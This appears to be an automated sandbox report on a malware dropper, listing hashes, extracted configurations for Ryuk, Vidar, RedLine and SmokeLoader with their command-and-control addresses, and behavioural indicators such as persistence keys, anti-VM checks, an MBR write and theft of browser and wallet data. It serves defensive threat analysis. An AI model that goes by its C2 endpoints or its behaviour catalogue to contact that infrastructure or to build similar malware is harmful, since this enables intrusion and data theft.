Overview

Static analysis plus eight behavioral tasks of setup_x86_x64_install.exe (three on windows7_x64, one on windows11_x64, four on windows10_x64); the full task list follows under "Static task" and "Behavioral task".
Resubmissions

  23-09-2021 21:08  210923-zyzyaafbfr
  22-09-2021 10:40  210922-mqyzssehck
  22-09-2021 05:21  210922-f114ksecck
  21-09-2021 05:29  210921-f6zspsgdg2
  20-09-2021 21:51  210920-1qj3jafed9
  20-09-2021 19:44  210920-yftswafca9
  20-09-2021 08:28  210920-kczcasgahr
  20-09-2021 04:42  210920-fb3acafedj
  20-09-2021 04:42  210920-fb2zksfecr

Analysis
  max time kernel: 781s
  max time network: 1800s
  platform: windows10_x64
  resource: win10-de-20210920
  submitted: 22-09-2021 10:40
Static task: static1

Behavioral tasks (sample setup_x86_x64_install.exe in every case):
  behavioral1  resource win7-ja-20210920
  behavioral2  resource win7v20210408
  behavioral3  resource win7-de-20210920
  behavioral4  resource win11
  behavioral5  resource win10v20210408
  behavioral6  resource win10-ja-20210920
  behavioral7  resource win10-en-20210920
  behavioral8  resource win10-de-20210920
General

  Target: setup_x86_x64_install.exe
  Size: 4.0MB
  MD5: 73491325fde5366b31c09da701d07dd6
  SHA1: a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
  SHA256: 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
  SHA512: 28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config

Extracted
  Path: C:\Users\Admin\AppData\Local\Temp\7zS58A0.tmp\__data__\config.txt
  Family: ryuk

Extracted
  Family: vidar
  Version: 40.7
  Botnet: 706
  C2: https://petrenko96.tumblr.com/
  Attributes: profile_id = 706

Extracted
  Family: redline
  Botnet: janesam
  C2: 65.108.20.195:6774

Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://varmisende.com/upload/
    http://fernandomayol.com/upload/
    http://nextlytm.com/upload/
    http://people4jan.com/upload/
    http://asfaltwerk.com/upload/
Signatures

Oski
Oski is an infostealer targeting browser data and crypto wallets.

Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (pid | pid_target | process | description):
  4248 | 3724 | rundll32.exe | Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  5388 | 3724 | rundll32.exe | Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  6712 | 3724 | rundll32.exe | Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (2 IoCs)
Processes (resource | yara_rule):
  behavioral8/memory/1244-247-0x00000000054A0000-0x00000000054BD000-memory.dmp | family_redline
  behavioral8/memory/3700-332-0x0000000000B30000-0x0000000000B4F000-memory.dmp | family_redline

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
Processes (resource | yara_rule):
  C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exe | family_socelars
  C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exe | family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess (3 IoCs)
Processes (pid | process | target process | description):
  1016 | WerFault.exe | Sun19eb40faaaa9.exe | PID 1016 created 3788
  5832 | WerFault.exe | setup.exe | PID 5832 created 4968
  5816 | WerFault.exe | Sun19de8ff4b6aefeb8.exe | PID 5816 created 1564
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
Checks for common network interception software (1 TTP)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (2 IoCs)
Processes (resource | yara_rule):
  behavioral8/memory/3788-232-0x00000000009A0000-0x0000000000A74000-memory.dmp | family_vidar
  behavioral8/memory/3788-233-0x0000000000400000-0x00000000004D7000-memory.dmp | family_vidar

(untitled signature)
Processes (resource | yara_rule):
  C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libcurlpp.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurlpp.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libstdc++-6.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS471324A2\libstdc++-6.dll | aspack_v212_v242

Blocklisted process makes network request (17 IoCs)
Processes (flow | pid | process):
  154 | 6176 | cmd.exe
  244 | 6452 | powershell.exe
  255 | 7688 | schtasks.exe
  257 | 2096 | powershell.exe
  266 | 6452 | powershell.exe
  270 | 2096 | powershell.exe
  272 | 7688 | schtasks.exe
  288 | 6452 | powershell.exe
  294 | 6452 | powershell.exe
  308 | 2208 | cmd.exe
  309 | 2208 | cmd.exe
  339 | 4512 | powershell.exe
  419 | 3656 | cmd.exe
  428 | 3656 | cmd.exe
  488 | 4532 | schtasks.exe
  489 | 4532 | schtasks.exe
  538 | 6396 | rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory (2 IoCs)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | 98zXQtfds9_B8K1wkYwThy5h.exe
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | GcleanerEU.exe
Executes dropped EXE (64 IoCs)
Processes (pid | process):
  372 | setup_installer.exe
  4076 | setup_install.exe
  2392 | Sun19e4ade31b2a.exe
  3780 | Sun193fda712d9f1.exe
  1640 | Sun19262b9e49ad.exe
  3920 | Sun1917b8fb5f09db8.exe
  3496 | Sun1908b94df837b3158.exe
  3124 | Sun191101c1aaa.exe
  3788 | Sun19eb40faaaa9.exe
  2864 | Sun198361825f4.exe
  1564 | Sun19de8ff4b6aefeb8.exe
  2808 | Sun1966fb31dd5a07.exe
  1768 | Sun1905815e51282417.exe
  1244 | Sun195a1614ec24e6a.exe
  4312 | Sun1966fb31dd5a07.tmp
  4640 | LzmwAqmV.exe
  4796 | Chrome 5.exe
  4864 | PublicDwlBrowser1100.exe
  4916 | 2.exe
  5056 | GcleanerEU.exe
  4968 | setup.exe
  3700 | udptest.exe
  3744 | 5.exe
  1236 | LivelyScreenRecF18.exe
  4248 | rundll32.exe
  4608 | 3002.exe
  4848 | jhuuee.exe
  2896 | Conhost.exe
  5004 | BearVpn 3.exe
  344 | setup_2.exe
  4840 | setup_2.tmp
  3888 | Conhost.exe
  4328 | LzmwAqmV.exe
  4928 | 3002.exe
  5908 | ultramediaburner.exe
  5964 | ultramediaburner.tmp
  5980 | Kysholowapae.exe
  6068 | Maneritaezho.exe
  3556 | UltraMediaBurner.exe
  5056 | GcleanerEU.exe
  5792 | installer.exe
  6176 | cmd.exe
  6484 | services64.exe
  6616 | offer.exe
  6840 | Enaxl.exe
  6952 | Wyexnknyu.exe
  6972 | Atomic.exe
  7088 | gcleaner.exe
  3496 | Install.exe
  4268 | autosubplayer.exe
  6468 | Install.exe
  5524 | sihost64.exe
  7016 | 5cyMyMfaTHF5mm4GGWje7aCw.exe
  1092 | reg.exe
  7140 | UZE7zKuIOHTqCGibtYD11gl4.exe
  4240 | QSydSxCGLaGDRZ1oU1LJVgeo.exe
  4532 | schtasks.exe
  908 | Conhost.exe
  5352 | g4sLH6CA5afgxnFDnbN6julV.exe
  6268 | jRMIx4HYZwNMhmRfA3bxVT31.exe
  2804 | Conhost.exe
  6452 | powershell.exe
  7172 | i_mtShrQKXhCFkurByO6l9wD.exe
  7184 | nKgSrPTMItcaLsJo4r1XrMq6.exe
Checks BIOS information in registry (2 TTPs, 19 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | UZE7zKuIOHTqCGibtYD11gl4.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 210921.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | msSZ2vyO5kijQfy3iLE0ayRx.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Done.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Done.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | msSZ2vyO5kijQfy3iLE0ayRx.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | UZE7zKuIOHTqCGibtYD11gl4.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 210921.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | A53F.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | A53F.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | i_mtShrQKXhCFkurByO6l9wD.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | i_mtShrQKXhCFkurByO6l9wD.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | schtasks.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | schtasks.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | chrome.exe

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | wDmspnJ.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | abLzenc.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | WMIC.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation | Kysholowapae.exe
Loads dropped DLL (64 IoCs)
Processes (pid | process; consecutive repeats collapsed with a count):
  4076 | setup_install.exe (x6)
  4312 | Sun1966fb31dd5a07.tmp
  2896 | Conhost.exe
  4840 | setup_2.tmp
  4212 | rundll32.exe
  5416 | rundll32.exe
  5792 | installer.exe (x3)
  7116 | MsiExec.exe (x2)
  4268 | autosubplayer.exe
  6744 | rundll32.exe
  6840 | Enaxl.exe (x3)
  5520 | reg.exe (x6)
  4268 | autosubplayer.exe
  5520 | reg.exe (x4)
  5792 | installer.exe
  5520 | reg.exe (x2)
  4268 | autosubplayer.exe (x2)
  7208 | l6unBCJnlLRYEZSAupPv3hRP.exe
  7732 | MsiExec.exe (x4)
  4268 | autosubplayer.exe
  7732 | MsiExec.exe (x3)
  1092 | reg.exe (x2)
  6920 | rundll32.exe (x2)
  5520 | reg.exe
  4268 | autosubplayer.exe (x2)
  3656 | cmd.exe (x2)
  4268 | autosubplayer.exe (x3)
  4532 | schtasks.exe (x5)
  6396 | rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Peciviceme.exe\"" | GcleanerEU.exe

Checks for any installed AV software in registry (1 TTP, 1 IoC)
Processes (description | ioc | process):
  Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab | chrome.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

(untitled signature)
Processes (description | ioc | process):
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | msSZ2vyO5kijQfy3iLE0ayRx.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Done.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 210921.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | A53F.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | WMIC.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | UZE7zKuIOHTqCGibtYD11gl4.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | i_mtShrQKXhCFkurByO6l9wD.exe

Drops Chrome extension (2 IoCs)
Processes (description | ioc | process):
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json | wDmspnJ.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json | abLzenc.exe

Drops desktop.ini file(s) (1 IoC)
Processes (description | ioc | process):
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | wDmspnJ.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes (description | ioc | process):
  File opened (read-only) | \??\A: through \??\Z:, every letter except C: and D: (24 drive roots) | installer.exe
  File opened (read-only) | \??\A: through \??\Z:, every letter except C: and D: (24 drive roots) | msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow | ioc):
  4 | ip-api.com
  108 | ipinfo.io
  109 | ipinfo.io
  117 | ip-api.com
  285 | ipinfo.io
  286 | ipinfo.io

Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes (description | ioc | process):
  File opened for modification | \??\PHYSICALDRIVE0 | B0A0.exe
Drops file in System32 directory (64 IoCs)
Processes (grouped by process; description | ioc):

svchost.exe (29):
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #1
  File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #2
  File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #3
  File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #4
  File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #6
  File opened for modification | C:\Windows\System32\Tasks\AdvancedUpdater
  File opened for modification | C:\Windows\System32\Tasks\PowerControl LG
  File opened for modification | C:\Windows\System32\Tasks\services64
  File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 7A201357966A7000
  File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent FDE6675885AC5B8B
  File opened for modification | C:\Windows\System32\Tasks\User_Feed_Synchronization-{51C2619E-6BAC-4F16-BCD0-83AD14025AE1}
  File opened for modification | C:\Windows\System32\Tasks\gwJDJFSIw
  File opened for modification | C:\Windows\System32\Tasks\JoozO1
  File opened for modification | C:\Windows\System32\Tasks\gZokipixH
  File opened for modification | C:\Windows\System32\Tasks\gSzceyuEo
  File opened for modification | C:\Windows\System32\Tasks\uZdEDCeaKQjVo2
  File opened for modification | C:\Windows\System32\Tasks\JFLQwz
  File opened for modification | C:\Windows\System32\Tasks\OMsCZDeJImgVgl
  File opened for modification | C:\Windows\System32\Tasks\PvKMXtxeDKBRRtMew
  File opened for modification | C:\Windows\System32\Tasks\spuInCFFcSJc
  File opened for modification | C:\Windows\System32\Tasks\JnrJAucJILlcMMe2
  File opened for modification | C:\Windows\System32\Tasks\JnrJAucJILlcMMe
  File opened for modification | C:\Windows\System32\Tasks\bOoGaaDxESFbryPOAb
  File opened for modification | C:\Windows\System32\Tasks\fHOlMGNmDutpzGekG
  File opened for modification | C:\Windows\System32\Tasks\spuRERNvqitL

wDmspnJ.exe (13):
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_57E7943B1B053B0B26E4C58B8CC44AAE

powershell.exe (11):
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (x11)

gpscript.exe (1):
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

schtasks.exe (2):
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

rundll32.exe (3):
  File opened for modification | C:\Windows\System32\GroupPolicy
  File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini
  File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol

forfiles.exe (2):
  File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini

Install.exe (2):
  File created | C:\Windows\system32\GroupPolicy\gpt.ini
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini

abLzenc.exe (1):
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
Suspicious use of NtSetInformationThreadHideFromDebugger (8 IoCs)
Processes (pid | process):
  7140 | UZE7zKuIOHTqCGibtYD11gl4.exe
  7224 | msSZ2vyO5kijQfy3iLE0ayRx.exe
  7172 | i_mtShrQKXhCFkurByO6l9wD.exe
  1440 | Done.exe
  7668 | 210921.exe
  4532 | schtasks.exe
  4696 | A53F.exe
  4276 | chrome.exe

Suspicious use of SetThreadContext (4 IoCs)
Processes (pid | process | target process | description):
  3888 | Conhost.exe | LzmwAqmV.exe | PID 3888 set thread context of 4328
  3916 | svchost.exe | svchost.exe | PID 3916 set thread context of 1040
  6484 | services64.exe | explorer.exe | PID 6484 set thread context of 7756
  2804 | Conhost.exe | chrome.exe | PID 2804 set thread context of 7836
Drops file in Program Files directory (64 IoCs)
Processes (grouped by process; description | ioc):

autosubplayer.exe (44), File created under C:\Program Files (x86)\lighteningplayer\ unless stated otherwise:
  lua\http\js\jquery.jstree.js
  lua\playlist\twitch.luac
  lua\playlist\vimeo.luac
  lua\playlist\cue.luac
  lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png
  lua\http\css\main.css
  lua\http\dialogs\batch_window.html
  lua\http\dialogs\browse_window.html
  lua\http\requests\status.json
  lua\intf\dummy.luac
  lua\meta\reader\filename.luac
  lua\modules\dkjson.luac
  lua\modules\common.luac
  plugins\access\libsatip_plugin.dll
  plugins\access\libimem_plugin.dll
  plugins\access\libdvdnav_plugin.dll
  plugins\access\libaccess_concat_plugin.dll
  plugins\access\libshm_plugin.dll
  plugins\access\libscreen_plugin.dll
  plugins\access\libfilesystem_plugin.dll
  plugins\audio_output\libafile_plugin.dll
  plugins\misc\libaddonsfsstorage_plugin.dll
  plugins\misc\libaddonsvorepository_plugin.dll
  plugins\misc\libgnutls_plugin.dll
  plugins\misc\liblogger_plugin.dll
  plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
  plugins\packetizer\libpacketizer_a52_plugin.dll
  plugins\spu\libaudiobargraph_v_plugin.dll
  plugins\lua\liblua_plugin.dll
  plugins\demux\libmjpeg_plugin.dll
  plugins\demux\librawvid_plugin.dll
  plugins\demux\libflacsys_plugin.dll
  plugins\demux\librawdv_plugin.dll
  plugins\demux\libmod_plugin.dll
  plugins\demux\libcaf_plugin.dll
  plugins\demux\libwav_plugin.dll
  plugins\demux\libasf_plugin.dll
  plugins\demux\libreal_plugin.dll
  plugins\meta_engine\libfolder_plugin.dll
  libssp-0.dll
  libvlccore.dll
  uninstall.exe
  File created | C:\Program Files (x86)\temp_files
  File opened for modification | C:\Program Files\temp_files\

schtasks.exe (3):
  File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW
  File created | C:\Program Files (x86)\Company\NewProduct\d.jfm
  File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.jfm

msiexec.exe (2):
  File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url
  File created | C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

wDmspnJ.exe (5):
  File created | C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\XIeUzOL.xml
  File created | C:\Program Files (x86)\iOPoQDDXUfpqC\ItkKAnP.dll
  File created | C:\Program Files (x86)\iOPoQDDXUfpqC\FrwjkHz.xml
  File created | C:\Program Files (x86)\oZVOHfyaZMUn\cUqfxSW.dll
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak

abLzenc.exe (4):
  File created | C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\qUmvKit.xml
  File created | C:\Program Files (x86)\iOPoQDDXUfpqC\WktMODE.xml
  File created | C:\Program Files (x86)\fSairMrhYOPU2\uvrUIbH.xml
  File created | C:\Program Files (x86)\fSairMrhYOPU2\cYMkdvQsmFqnU.dll

ultramediaburner.tmp (2):
  File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat
  File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

data_load.exe (2):
  File opened for modification | C:\Program Files\temp_files\cache.dat
  File opened for modification | C:\Program Files\temp_files\bckf.fon

98zXQtfds9_B8K1wkYwThy5h.exe (1):
  File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak

jRMIx4HYZwNMhmRfA3bxVT31.exe (1):
  File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
Drops file in Windows directory 55 IoCs
Processes:
schtasks.exe, msiexec.exe, svchost.exe, schtasks.exe, MicrosoftEdge.exe, schtasks.exe, schtasks.exe, WMIC.exe, WMIC.exe, schtasks.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, DyzW75Vg9OFYpumqyTL2gvjP.exe, MicrosoftEdgeCP.exe, schtasks.exe, MicrosoftEdgeCP.exe
description | ioc | process
File created | C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job | schtasks.exe
File opened for modification | C:\Windows\Installer\MSI6590.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | (no process recorded)
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job | svchost.exe
File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9E83.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe | msiexec.exe
File created | C:\Windows\Installer\39a31.msi | msiexec.exe
File opened for modification | C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job | schtasks.exe
File created | C:\Windows\Installer\39a2e.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA5B8.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAA6E.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC8F7.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI2ECD.tmp | msiexec.exe
File opened for modification | C:\Windows\Tasks\fHOlMGNmDutpzGekG.job | svchost.exe
File opened for modification | C:\Windows\Installer\MSIC7EC.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8A6E.tmp | msiexec.exe
File opened for modification | C:\Windows\Tasks\PvKMXtxeDKBRRtMew.job | svchost.exe
File opened for modification | C:\Windows\Installer\MSICA12.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB0B9.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI1E51.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\Tasks\JnrJAucJILlcMMe.job | schtasks.exe
File opened for modification | C:\Windows\Tasks\fHOlMGNmDutpzGekG.job | schtasks.exe
File created | C:\Windows\Tasks\PvKMXtxeDKBRRtMew.job | WMIC.exe
File opened for modification | C:\Windows\Tasks\JnrJAucJILlcMMe.job | svchost.exe
File opened for modification | C:\Windows\Installer\MSIADCA.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI4813.tmp | msiexec.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | WMIC.exe
File opened for modification | C:\Windows\Installer\MSI5A25.tmp | msiexec.exe
File created | C:\Windows\Tasks\JnrJAucJILlcMMe.job | schtasks.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Installer\MSIA8D7.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
